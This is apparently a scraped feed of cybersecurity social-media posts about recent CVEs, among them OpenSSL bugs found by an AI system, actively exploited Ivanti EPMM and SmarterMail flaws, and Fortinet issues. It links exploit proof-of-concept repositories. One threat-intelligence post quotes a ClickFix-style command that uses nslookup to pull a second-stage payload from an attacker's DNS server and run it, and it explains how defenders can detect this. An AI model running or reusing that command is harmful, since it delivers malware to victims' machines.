“In the latest #OpenSSL security release on January 27, 2026, twelve new zero-day vulnerabilities (meaning unknown to the maintainers at time of disclosure) were announced. Our AI system is responsible for the original discovery of all twelve, each found and responsibly disclosed to the OpenSSL team during the fall and winter of 2025. Of those, 10 were assigned #CVE-2025 identifiers and 2 received CVE-2026 identifiers. Adding the 10 to the three we already found in the Fall 2025 release, AISLE is credited for surfacing 13 of 14 OpenSSL #CVEs assigned in 2025, and 15 total across both releases. This is a historically unusual concentration for any single research team, let alone an AI-driven one.
These weren't trivial findings either. They included CVE-2025-15467, a stack buffer overflow in CMS message parsing that's potentially remotely exploitable without valid key material, and exploits for which have been quickly developed online. OpenSSL rated it HIGH severity; NIST's CVSS v3 score is 9.8 out of 10 (CRITICAL, an extremely rare severity rating for such projects). Three of the bugs had been present since 1998-2000, for over a quarter century having been missed by intense machine and human effort alike. One predated OpenSSL itself, inherited from #EricYoung's original #SSLeay implementation in the 1990s. All of this in a codebase that has been fuzzed for millions of CPU-hours and audited extensively for over two decades by teams including Google's.
In five of the twelve cases, our AI system directly proposed the patches that were accepted into the official release.”
https://aisle.com/blog/what-ai-security-research-looks-like-when-it-works
##updated 2026-01-30T00:31:29
7 posts
1 repos
https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE
The German BSI on the recently patched Ivanti Endpoint Manager Mobile (EPMM) vulnerability CVE-2026-1281: "the BSI has evidence that a exploitation of the vulnerability may have taken place at least since summer 2025." (Translated)
Kudo's to them for making this public.
#cybersecurity #vulnerability #CVE-2026-1281
##This was posted yesterday.
Unit 42: Critical Vulnerabilities in Ivanti EPMM Exploited https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/ @unit42_intel #infosec #Ivanti #vulnerability
##🚨 Active exploitation confirmed for a new unauthenticated RCE in Ivanti - CVE-2026-1281
With a CVSS of 9.8 and part of CISA KEV, attackers need *zero* credentials to use this CVE and exploit legacy bash scripts and gain root access.
So we updated Pentest-Tools.com to help you confirm the risk:
📡 Network Scanner - detects exposed Ivanti EPMM instances on your perimeter.
🎯 Sniper Auto-Exploiter - safely demonstrates the RCE to prove the risk is real (and urgent).
Find more info for your rapid response flows here: https://pentest-tools.com/vulnerabilities-exploits/ivanti-endpoint-manager-mobile-remote-code-execution_28881
#offensivesecurity #ethicalhacking #infosec #cybersecurity #vulnerabilitymanagement
##Critical Vulnerabilities in Ivanti EPMM Exploited
https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/
##This was posted yesterday.
Unit 42: Critical Vulnerabilities in Ivanti EPMM Exploited https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/ @unit42_intel #infosec #Ivanti #vulnerability
##🚨 Active exploitation confirmed for a new unauthenticated RCE in Ivanti - CVE-2026-1281
With a CVSS of 9.8 and part of CISA KEV, attackers need *zero* credentials to use this CVE and exploit legacy bash scripts and gain root access.
So we updated Pentest-Tools.com to help you confirm the risk:
📡 Network Scanner - detects exposed Ivanti EPMM instances on your perimeter.
🎯 Sniper Auto-Exploiter - safely demonstrates the RCE to prove the risk is real (and urgent).
Find more info for your rapid response flows here: https://pentest-tools.com/vulnerabilities-exploits/ivanti-endpoint-manager-mobile-remote-code-execution_28881
#offensivesecurity #ethicalhacking #infosec #cybersecurity #vulnerabilitymanagement
##Critical Vulnerabilities in Ivanti EPMM Exploited
https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/
##updated 2026-01-27T18:33:14
1 posts
2 repos
https://github.com/hilwa24/CVE-2026-23760_SmarterMail-Auth-Bypass-and-RCE
Alarming Surge in SmarterMail Exploits Threatens Email Servers Worldwide
Cybersecurity experts are raising the alarm as critical vulnerabilities in SmarterMail—specifically CVE-2026-24423 and CVE-2026-23760—are being rapidly weaponized. Exploit proof-of-concepts (PoCs), stolen administrator credentials, and even ransomware deployment instructions are circulating openly on Telegram channels. Organizations relying on these email servers face an urgent need to patch their…
https://undercodenews.com/alarming-surge-in-smartermail-exploits-threatens-email-servers-worldwide/
##updated 2026-01-20T16:16:06.200000
2 posts
4 repos
https://github.com/cyberdudebivash/CYBERDUDEBIVASH-FortiSIEM-CVE-2025-64155-Scanner
https://github.com/Mefhika120/Ashwesker-CVE-2025-64155
CVE-2025-64155: 3 Years of Remotely Rooting the Fortinet FortiSIEM https://horizon3.ai/attack-research/disclosures/cve-2025-64155-three-years-of-remotely-rooting-the-fortinet-fortisiem/
##CVE-2025-64155: 3 Years of Remotely Rooting the Fortinet FortiSIEM https://horizon3.ai/attack-research/disclosures/cve-2025-64155-three-years-of-remotely-rooting-the-fortinet-fortisiem/
##updated 2026-01-13T18:31:18
2 posts
CVE-2026-20965: Cymulate Research Labs Discovers Token Validation Flaw that Leads to Tenant-Wide RCE in Azure Windows Admin Center https://cymulate.com/blog/cve-2026-20965-azure-windows-admin-center-tenant-wide-rce/
##CVE-2026-20965: Cymulate Research Labs Discovers Token Validation Flaw that Leads to Tenant-Wide RCE in Azure Windows Admin Center https://cymulate.com/blog/cve-2026-20965-azure-windows-admin-center-tenant-wide-rce/
##updated 2026-01-13T18:31:14
2 posts
Fortinet Forticlient EMS RCE CVE-2025-59922 and one IMG tag to rule them all https://baldur.dk/blog/fortinet-ems-rce.html
##Fortinet Forticlient EMS RCE CVE-2025-59922 and one IMG tag to rule them all https://baldur.dk/blog/fortinet-ems-rce.html
##updated 2025-10-13T15:45:56
1 posts
1 repos
cmd /c "nslookup example.com 192.168.1[.]1 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1
To an untrained eye, the above command might not look suspicious, as it uses a legitimate Windows tool called nslookup, but in reality the command is part of a staged infection as it delivers a second-stage payload via DNS that is controlled by the attacker.
Just because a legitimate executable runs commands doesn't mean that the binary itself or its parameters can't be abused to deliver or execute something malicious. The same goes for Velociraptor version 0.73.4.0, which contains a privilege escalation vulnerability under CVE-2025-6264. It is a legitimate DFIR tool, but because of its vulnerability, ransomware gangs use it to elevate privileges and execute malicious commands with higher privileges.
When detecting malicious activity, context and the commands executed are very important, because one technique used by threat actors to stay undetected as long as possible is abusing legitimate tools or built-in Windows executables to draw less attention to their malicious activities. To an untrained eye, such commands can look legitimate because the executables are reputable, they may be attributed as false positives or fly under the radar if detection engineering is not mature enough.
#Malware #ThreatIntel #ThreatIntelligence #ClickFix #SOC #DFIR #Microsoft
##updated 2023-01-29T05:06:54
2 posts
4 repos
https://github.com/kh4sh3i/GitLab-SSRF-CVE-2021-22214
https://github.com/aaminin/CVE-2021-22214
Gitlab vulnerability CVE-2021-22175 got added to the CISA KEV. But this vuln is just a more complete patch to CVE-2021-22214. Likewise CVE-2021-39935 covers even more case where the CI Lint function could be used without authentication. In fact, the exploit code identical for all vulnerabilites. CVE-2021-39935 was already on the list, CVE-2021-22175 got added today and CVE-2021-22214 is still missing.
##Gitlab vulnerability CVE-2021-22175 got added to the CISA KEV. But this vuln is just a more complete patch to CVE-2021-22214. Likewise CVE-2021-39935 covers even more case where the CI Lint function could be used without authentication. In fact, the exploit code identical for all vulnerabilites. CVE-2021-39935 was already on the list, CVE-2021-22175 got added today and CVE-2021-22214 is still missing.
###OT #Advisory VDE-2026-0001
JBL: DoS vulnerability in Flip 4
Any attacker in radio range can send malicious messages to cause the device to crash.
#CVE CVE-2025-41725
https://certvde.com/en/advisories/vde-2026-0001/
#CSAF https://harman.csaf-tp.certvde.com/.well-known/csaf/white/2026/hbsa-2025-0003.json #oCSAF
###OT #Advisory VDE-2026-0001
JBL: DoS vulnerability in Flip 4
Any attacker in radio range can send malicious messages to cause the device to crash.
#CVE CVE-2025-41725
https://certvde.com/en/advisories/vde-2026-0001/
#CSAF https://harman.csaf-tp.certvde.com/.well-known/csaf/white/2026/hbsa-2025-0003.json #oCSAF
##